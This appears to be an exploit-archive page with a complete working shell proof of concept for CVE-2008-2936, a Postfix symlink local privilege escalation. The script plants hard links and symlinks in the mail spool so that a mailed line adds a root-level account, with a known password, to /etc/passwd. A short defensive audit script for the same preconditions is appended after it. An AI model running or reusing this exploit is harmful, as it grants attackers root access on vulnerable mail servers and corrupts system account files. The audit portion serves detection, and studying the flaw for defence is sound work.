Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit

Published: 31 Aug 2008 00:00:00. Reported by: RoMaNSoFt. Type: zdt. Source: 0day.today. 33 views.

Postfix local root vulnerability PoC, CVE-2008-2936 exploit

====================================================================
Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit
====================================================================



#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[email protected]>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#

# Config

writable_dir=/tmp
spool_dir=/var/mail		# Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq	# lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at		# Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh"   # Pass is "dsrrocks"
postfix=`which postfix`		# /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap


# Funcs

quit()
{
  echo "$1"
  exit
}


# Step 1: is my system vulnerable?

head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
  echo "[*] Postfix seems to be installed"
else
  quit "[!] Are you sure Postfix is installed?"
fi

mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2

if [ -L $writable_dir/pocfix/dst2 ] ; then
  echo "[*] Hardlink to symlink not dereferenced"
  rm -rf $writable_dir/pocfix
else
  rm -rf $writable_dir/pocfix
  quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi

if [ -d $spool_dir -a -w $spool_dir ] ; then
  echo "[*] Spool dir is writable"
else
  quit "[!] Spool dir is not writable"
fi

if [ -e $spool_dir/$user ] ; then
  rm -f $spool_dir/$user
  echo "[*] Mailbox for \"$user\" found. Trying to delete it"

  if [ -e $spool_dir/$user ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

if [ -e $spool_dir/$useful_link_dst ] ; then
  rm -f $spool_dir/$useful_link_dst
  echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"

  if [ -e $spool_dir/$useful_link_dst ] ; then
    quit "[!] Couldn't delete it"
  else
    echo "[*] Deletion ok"
  fi

fi

aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
  if [ $aliases ] ; then
    $postmap -q $user $aliases > /dev/null
    if [ $? -eq 0 ] ; then
      quit "[!] Mail alias for \"$user\" exists"
    fi
  fi
fi

lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
  quit "[!] Non-Postfix LDA detected"
fi 

$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
  quit "[!] Maildir-style mailbox detected"
fi


# Step 2: Exploiting

ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user

sleep $seconds

diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null

if [ $? -eq 0 ] ; then
  echo "[!] Exploit failed"
else
  echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi

rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst
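The preconditions the PoC's Step 1 probes (a writable spool, mailbox entries that are symlinks or carry extra hard links, a kernel that does not follow symlinks on link(2)) recast as a defender's spool audit. This is an added example, not part of RoMaNSoFt's script; it assumes a POSIX sh with ls, find, sed, sort and mktemp and needs no Postfix install to run.

```shell
#!/bin/sh
# Added defensive audit (not from the original PoC) for the conditions
# CVE-2008-2936 exploitation relies on. Assumes POSIX sh + ls/find/sed/sort/mktemp.

# Condition 1: the spool is world-writable, so any local user can plant
# $spool_dir/<user> before Postfix delivers to it. Returns 0 if so.
spool_is_world_writable() {
  [ -d "$1" ] || return 1
  # Char 9 of the ls permission string is the "other" write bit.
  case $(ls -ld "$1" | cut -c1-10) in
    d???????w*) return 0 ;;
    *)          return 1 ;;
  esac
}

# Condition 2: a direct child of the spool that is a symlink or has more
# than one hard link. The PoC plants a hard link to a root-owned symlink
# so that a plain "is it a symlink?" test on the mailbox path passes.
# Prints offending basenames, sorted, one per line.
list_suspicious_mailboxes() {
  # "dir/." with "! -name . -prune" lists direct children only (portable).
  find "$1"/. ! -name . -prune \( -type l -o -links +1 \) \
    | sed 's#.*/##' | sort
}

# Condition 3: does link(2) on this system hard-link the symlink itself
# rather than its target? Linux does, which is why the MDA, not the
# kernel, has to refuse multi-link mailboxes. Returns 0 if it does.
hardlink_to_symlink_allowed() {
  d=$(mktemp -d) || return 1
  : > "$d/src"; ln -s "$d/src" "$d/dst1"; ln "$d/dst1" "$d/dst2"
  if [ -L "$d/dst2" ]; then rc=0; else rc=1; fi
  rm -rf "$d"
  return $rc
}

# Audit a real spool when a directory is given, e.g.:
#   sh audit.sh "$(postconf -h mail_spool_directory)"
if [ $# -gt 0 ]; then
  spool=$1
  spool_is_world_writable "$spool" && echo "[!] $spool is world-writable"
  list_suspicious_mailboxes "$spool" | sed 's/^/[!] symlink or multi-link mailbox: /'
  hardlink_to_symlink_allowed && echo "[i] hard links to symlinks are not followed here"
fi
```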



#  0day.today [2018-04-08]  #

31 Aug 2008 00:00 | Risk: 6.8 (Medium) | Vulners AI Score: 6.8 | EPSS: 0.00249 | 33 views